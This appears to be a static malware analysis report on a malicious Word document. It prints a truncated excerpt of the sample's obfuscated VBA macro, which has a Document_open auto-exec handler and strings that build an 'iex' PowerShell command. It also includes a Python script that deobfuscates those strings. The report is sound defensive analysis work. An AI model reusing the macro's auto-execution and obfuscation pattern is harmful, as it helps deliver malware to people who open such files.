Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a8a1e39f215f3b22…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 319.8 KB
Created (document metadata): 2018-07-12 13:22:00
Authoring application: Microsoft Office Word
First seen: 2018-07-23
MD5: c621153c09943892ac5856dd855d48ff
SHA-1: 73b5c44b4110aee0b8adf3349e244c3a43b42d7d
SHA-256: a8a1e39f215f3b22e55d47a48e99e5af438224f789d91ab6a26c662658184e5b
Risk score: 162

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 User Execution: Malicious File

The sample is a Microsoft Word document (OLE/CFB container) carrying VBA macros. A 'Document_open' auto-execution handler is present, so the macro runs as soon as the file is opened with macros enabled; the analysis also flagged a 'Shell()' call, i.e. an attempt to execute arbitrary commands, which is the usual first stage for downloading and running a further payload. The decoded source is heavily obfuscated: the handler invokes a named procedure through Application.Run() with an argument assembled from many helper functions, and each helper builds a string from short literals and Chr() calls interleaved with never-assigned variables and junk arithmetic (both harmless under 'On Error Resume Next', since unassigned variables concatenate as empty strings). The fragments visible in the macro preview below ("poW", "ER", "shE", "Ll ", "$SH", "Elli", "d[1]", "Id", "[1", "3]", "x')", "$(Se", "t-i", "tEM ", "'VA", "RIA", "BLe:", "ofs") assemble into a PowerShell command line that spells 'iex' from characters of the $ShellId string ($ShellId[1] + $ShellId[13] + 'x', which evaluates to 'iex' in a standard powershell.exe console) and clears $OFS via Set-Item 'Variable:ofs' '' before joining a list of numeric character codes, a well-known PowerShell obfuscation pattern. No specific family could be identified.

Heuristics (5)

  • VBA macros detected [medium] OLE_VBA_MACROS (3 related findings)
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    A Shell() call is present in the VBA code
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    A Document_Open auto-execution macro is present
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) / cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard DrawingML XML namespace identifier that Office itself embeds, not a network indicator.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 45742 bytes
SHA-256: b8aeb309ae3a871621b12113f0b527752b58a7963d1afe40b5b1bb0bcff5d9ec
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "PaSOnTflGh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
   vSGUEQ = (zjsBH + lOzdXX + qsvlUu + YczwS) - QzXdY * GwYudt
   fubZws = (ECXUA + NdVmu + FdmqVE + QASwRs) - CYdBXB * hMwAJ
   LjiFfF = (WCuANW + jNhUh + ASiXL + qjsfXA) - dWutm * JbDUP
   UJaYM = 85690 - Lqwuf - TSLfw / isncLC - 26715 / rYDjZo - quuLfz * zIGUNO * ndrOc + XhjOV
   UmmQU = 81738 - dYQTSw - viWrpz / EvLRwi - 35989 / Nfphj - KWpzX * YOMXwj * cDKXj + lQrbzY
   JYQppM = (iWfOqi + BmfZvC + zMatv + GKEUjs) - AIzCOs * VFoXMW
QjVsmVQFFBJ = Application.Run("pDzlSCUsFGsYB", "" + UDHiJjPsEFUAcU + FbRHpAT + MFiEcwjRSP + qHVhqnwbn + UGAFIoNO + DEwvNKGHYNn + pMWsfVOD + ckWZviK + ObMmSjhMU + kuYlSq + zQbVZSZY + ofQrjKc + jVwfL + sDTTUMjpq + ISCuUVz + oWnKKszB + KlikMckIhs + EpinUPPqFD)
   hwCTu = 81484 - LOCDbt - Tnruc / OfjaIn - 58133 / waPHd - DOZQN * SHFBlH * JvbwKa + vCRcKH
End Sub


Attribute VB_Name = "OnnwwZIFN"
Function MFiEcwjRSP()
On Error Resume Next
mAUHSU = wMRrd * svzDz * 69289 / iiqalh + 63885 * oVWzwJ - slzaDh * oUmukQ / (2474 / ffDVO)
skVOVFQ = "" + VlnaKrvuiQKDN + jRzuVoqwQs + "poW" + qtdudisdoQGVw + QTGwpbIXEPKnE + "ER" + WiYBEABWjUVai + dzvvZcKu + "shE" + hWYiTvnzA + wuVsPzZdTA + "Ll " + ulMrJFLM + nWdcrNZhchX + " " + Chr(34) + " &" + CaCKfkQcNHPi + DdsojlT + "( "
ibKLj = nkmmtO * niRUiH + 4054 * mNzhz + (7261 / BADJwj * NztwB + OGVwAu * (opjjCi * vNMdld / jlikR * VVUaf))
   OmGLEm = sjIEK * GujcW + 511 * POzwHW + (7657 / tqANvc * YZYMpp + fWowm * (zIEOT * iApHEi / nztIqO * SWHDKK))
mBIFPzuP = "" + jsAjCYl + XGOuWAkPM + "$SH" + fUnMjhJTUIAw + PVLwjFbXTLdD + "Elli" + UjLSiQULEozUOS + WKhIGiZT + "d[1]" + KIAcifPKw + hNPRDQXwOqIfKo + Chr(43) + "$s" + KspKspQGMK + SFEUGMp + "he"
TpbIX = (50375 / EjUoqI / 776 * LfHwAI / (JajnGq / DsotG))
   hSjRIF = (41195 / zbYIz / 54849 * pCVuif / (YkTwq / bzwBOK))
   qCOBU = (29473 / BcqnPJ / 9868 * IbEsw / (FsoSj / moZzz))
KmCccXa = "" + isDQlaHPwql + mYMDwjt + "Ll"
bpbctF = (2810 / bnPvWl / 4098 * cbdCI / (XmGhh / AOkquB))
   wobPG = (36292 / lzdSaL / 83497 * CDfjJR / (VLXamM / YAUuw))
   KOowzf = (42997 / pwhOXc / 81761 * uaQUV / (FXZNY / LOzSij))
wNJdbTBHFW = "" + NwpVmod + PIZhnOVh + "Id" + SPsfjkhZ + jOjBBpjqofArzQ + "[1" + nVklzMJzVlV + kEPBQaAZ + "3]" + Chr(43) + "'"
UUBnu = (37525 / vGnsaK / 33268 * umsPi / (wpjZk / lJwhWB))
   zEwkzZ = (44884 / PiJfQ / 67044 * RXaIu / (iUOKj / mIGVZ))
   wfisHK = (51664 / bUCzM / 77705 * wTFmfQ / (TjDbk / hqKEPp))
SaoiBS = "" + qnHSEoYZ + FTCtjKwtp + "x')" + jkaNRlRJNk + bZdQHDFzFWw + "(\" + Chr(34) + GsbwYfkfn + hEnDHPk + "$(Se" + qbTCtpq + OMmUwLsp + "t-i" + FTznTbiDPBqqm + ZiZZCjp + "tEM " + YtQMGcLRCu + snAbLlajSYaS + " 'VA" + jSQLFPTcPZ + wnqZoruYjr + "RIA" + rzPQCATzwhwsBq + MQYaQoom + "BLe:" + kjYrsptSUIADZP + ZPrwYzCkL + "ofs" + wjCIcXJPk + oGwiWjI + "' " + IUDPZvuVnjojd + lSzYfQzVoVakzp + "''"
bBYKd = (56317 / jhdncD / 71073 * LkDwE / (kibJwP / wKvfMK))
RBhzSlt = "" + MRIfPqC + SDzOzwsVoq + " )\" + Chr(34) + AfNtkWhIQtYtGY + ZRtcwmjMwkKzm + " " + Chr(43) + " [" + VHILmumfUU + YiEIbKEw + "st" + uwNwBwAMiVZXCl + ztnmZIij + "Ri" + scjoiuwYNKzn + iIlzhBbSJOKLJ + "nG"
MFiEcwjRSP = "" + mThqTDYctn + iYoPLzzHRW + skVOVFQ + GFaSUiWlNBaqPz + GfsMDbztVzzL + mBIFPzuP + FPojjNdFIPQ + dzzzOZLB + KmCccXa + SviIjzUfLZk + BjNMIAWd + wNJdbTBHFW + QUwXAklA + mVoFFzInkE + SaoiBS + hmwSBNCBPAW + nkZUuaZIb + RBhzSlt
   FrKhHf = (86927 / BawnKC / 52678 * YnjoRq / (IPDNzU / vKGqRF))
   sIHLri = (86927 / romJbh / 68349 * zaDlw / (qRNjT / duTGOQ))
End Function
Function qHVhqnwbn()
On Error Resume Next
TKPPmk = (60792 / aSliaj / 73397 * PuBRDR / (FUfnjU / VSBJNi))
mYAbjCnsZsE = "" + XkZmijwU + PCLOFaCOKv + "]( (" + wKqzSjRWIYpiih + RVVLMMEiKDw + "36," + PsfFalOw + SCEMrNdjX + "85" + zoZukmFHnP + MsjJdEwPhjED + ", " + ANUjTYnm + FKpzJou + "76,7" + UsTKDAfbfqNj + dlsnGvLuZacD 
... (truncated)
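The string-building helpers in the preview above follow one mechanical pattern: every assignment is `"" + neverAssignedVar + "literal" + Chr(n) + ...`, padded with junk arithmetic lines, and the function's return value is the concatenation of the helpers. Because the padding variables are never assigned, `On Error Resume Next` lets them evaluate to Empty and they add nothing. The script below is an added example written for this report (not part of the report's tooling or of oletools): it walks such assignments in order, drops the unassigned names, joins the literals and `Chr()` calls, and then resolves the `$ShellId[n]` index trick. The VBA sample it runs on is constructed to mirror the fragments in the preview with shortened identifier names; `SHELL_ID` is the value of `$ShellId` in a stock powershell.exe console, which is the assumption the index resolution relies on.

```python
"""Reassemble the string-building statements of an obfuscated VBA macro.

Added example; not part of the report or of oletools. Assumes the pattern
visible in the extracted macro: helpers assign
    var = "" + neverAssigned + "lit" + Chr(n) + ...
with junk arithmetic lines between them. Never-assigned variables are Empty
under On Error Resume Next and concatenate as "", so dropping them and
joining the literals recovers the command handed to Application.Run.
"""
import re

# Value of $ShellId in a stock powershell.exe console (assumption this
# decoder relies on). Index 1 is 'i', index 13 is 'e'; with a trailing 'x'
# the macro spells "iex" without the literal ever appearing in the source.
SHELL_ID = "Microsoft.PowerShell.Console"

# Constructed sample modeled on the fragments in the extracted source above
# (identifier names shortened; this is not the full 45 KB module).
SAMPLE_VBA = r'''
Function MFiEcwjRSP()
On Error Resume Next
mAUHSU = wMRrd * svzDz * 69289 / iiqalh + 63885 * oVWzwJ
skVOVFQ = "" + VlnaK + jRzuV + "poW" + qtdud + "ER" + WiYB + "shE" + hWYiT + "Ll " + ulMr + " " + Chr(34) + " &" + CaCK + "( "
ibKLj = nkmmtO * niRUiH + 4054 * mNzhz
mBIFPzuP = "" + jsAj + "$SH" + fUnM + "Elli" + UjLS + "d[1]" + KIAc + Chr(43) + "$s" + Ksp + "he"
KmCccXa = "" + isDQ + "Ll"
wNJdbTBHFW = "" + NwpV + "Id" + SPsf + "[1" + nVkl + "3]" + Chr(43) + "'"
SaoiBS = "" + qnHS + "x')" + jkaN + "(\" + Chr(34) + Gsbw + "$(Se" + qbTC + "t-i" + FTzn + "tEM " + YtQM + " 'VA" + jSQL + "RIA" + rzPQ + "BLe:" + kjYr + "ofs" + wjCI + "' " + IUDP + "''"
RBhzSlt = "" + MRIf + " )\" + Chr(34) + AfNt + " " + Chr(43) + " [" + VHIL + "st" + uwNw + "Ri" + scjo + "nG"
MFiEcwjRSP = "" + mThq + skVOVFQ + GFaS + mBIFPzuP + FPoj + KmCccXa + SviI + wNJdbTBHFW + QUwX + SaoiBS + hmwS + RBhzSlt
End Function
'''

ASSIGN_RE = re.compile(r"^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$")
LITERAL_RE = re.compile(r'^"((?:[^"]|"")*)"$')
CHR_RE = re.compile(r"^Chr\((\d+)\)$", re.IGNORECASE)
IDENT_RE = re.compile(r"^[A-Za-z_]\w*$")


def split_concat(expr):
    """Split a VBA expression on the '+' operators that sit outside string literals."""
    parts, buf, in_str = [], [], False
    for ch in expr:
        if ch == '"':
            in_str = not in_str
        if ch == "+" and not in_str:
            parts.append("".join(buf).strip())
            buf = []
        else:
            buf.append(ch)
    parts.append("".join(buf).strip())
    return parts


def eval_concat(expr, env):
    """Return the string value of a pure concatenation, or None for anything else."""
    out = []
    for tok in split_concat(expr):
        lit = LITERAL_RE.match(tok)
        chr_call = CHR_RE.match(tok)
        if lit:
            out.append(lit.group(1).replace('""', '"'))  # VBA writes " as ""
        elif chr_call:
            out.append(chr(int(chr_call.group(1))))
        elif IDENT_RE.match(tok):
            out.append(env.get(tok, ""))  # never assigned -> Empty -> ""
        else:
            return None  # junk arithmetic, calls, parentheses: not a string line
    return "".join(out)


def decode_vba(src):
    """Evaluate assignments in source order; return {name: string} for the string ones."""
    env = {}
    for line in src.splitlines():
        m = ASSIGN_RE.match(line)
        if not m:
            continue
        name, expr = m.groups()
        val = eval_concat(expr, env)
        if val:
            env[name] = val
    return env


def resolve_shellid(cmd):
    """Replace $ShellId[n] with the character it selects, then fold 'a'+'b' literals."""
    cmd = re.sub(r"\$shellid\[(\d+)\]",
                 lambda m: "'" + SHELL_ID[int(m.group(1))] + "'",
                 cmd, flags=re.IGNORECASE)
    fold = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
    while True:
        folded = fold.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", cmd)
        if folded == cmd:
            return cmd
        cmd = folded


def indicators(cmd):
    """Label the PowerShell obfuscation idioms present in a decoded command."""
    low = cmd.lower()
    found = []
    if "powershell" in low:
        found.append("powershell")
    if re.search(r"\$shellid\[\d+\]", low):
        found.append("shellid-index")
    if re.search(r"set-item\s+'variable:ofs'\s+''", low):
        found.append("ofs-cleared")  # $OFS='' joins a [char[]] without separators
    if "'iex'" in resolve_shellid(cmd).lower():
        found.append("iex")
    return found


if __name__ == "__main__":
    strings = decode_vba(SAMPLE_VBA)
    cmd = strings["MFiEcwjRSP"]
    print(cmd)
    print(resolve_shellid(cmd))
    print(indicators(cmd))
```

Running the script on the constructed sample yields the recovered prefix `poWERshELl  " &( $SHEllid[1]+$sheLlId[13]+'x')(\"$(Set-itEM  'VARIABLe:ofs' '' )\" + [stRinG`, which `resolve_shellid` turns into `&( 'iex')(...`. Against the real `macros.bas` the same walk has to be run across all helper functions in the order the entry point concatenates them, and the `Application.Run` argument, not a single helper, is the string to recover; the evaluator returns None for every junk arithmetic line, so those drop out automatically.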